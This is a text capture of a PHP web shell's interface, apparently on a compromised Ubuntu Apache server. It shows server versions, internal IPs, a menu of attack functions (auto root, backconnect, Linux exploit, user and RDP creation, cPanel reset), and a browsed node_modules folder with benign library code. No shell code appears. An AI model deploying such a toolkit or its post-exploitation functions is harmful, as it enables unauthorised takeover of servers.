Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
uri-js /
dist /
esnext /
[ HOME SHELL ]
Name
Size
Permission
Action
schemes
[ DIR ]
drwxr-xr-x
index.d.ts
23
B
-rwxr-xr-x
index.js
537
B
-rwxr-xr-x
index.js.map
747
B
-rwxr-xr-x
regexps-iri.d.ts
97
B
-rwxr-xr-x
regexps-iri.js
114
B
-rwxr-xr-x
regexps-iri.js.map
192
B
-rwxr-xr-x
regexps-uri.d.ts
160
B
-rwxr-xr-x
regexps-uri.js
7.63
KB
-rwxr-xr-x
regexps-uri.js.map
8.09
KB
-rwxr-xr-x
uri.d.ts
2.39
KB
-rwxr-xr-x
uri.js
19.68
KB
-rwxr-xr-x
uri.js.map
18.77
KB
-rwxr-xr-x
util.d.ts
343
B
-rwxr-xr-x
util.js
1.09
KB
-rwxr-xr-x
util.js.map
1.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.js
export function merge(...sets) { if (sets.length > 1) { sets[0] = sets[0].slice(0, -1); const xl = sets.length - 1; for (let x = 1; x < xl; ++x) { sets[x] = sets[x].slice(1, -1); } sets[xl] = sets[xl].slice(1); return sets.join(''); } else { return sets[0]; } } export function subexp(str) { return "(?:" + str + ")"; } export function typeOf(o) { return o === undefined ? "undefined" : (o === null ? "null" : Object.prototype.toString.call(o).split(" ").pop().split("]").shift().toLowerCase()); } export function toUpperCase(str) { return str.toUpperCase(); } export function toArray(obj) { return obj !== undefined && obj !== null ? (obj instanceof Array ? obj : (typeof obj.length !== "number" || obj.split || obj.setInterval || obj.call ? [obj] : Array.prototype.slice.call(obj))) : []; } export function assign(target, source) { const obj = target; if (source) { for (const key in source) { obj[key] = source[key]; } } return obj; } //# sourceMappingURL=util.js.map
Close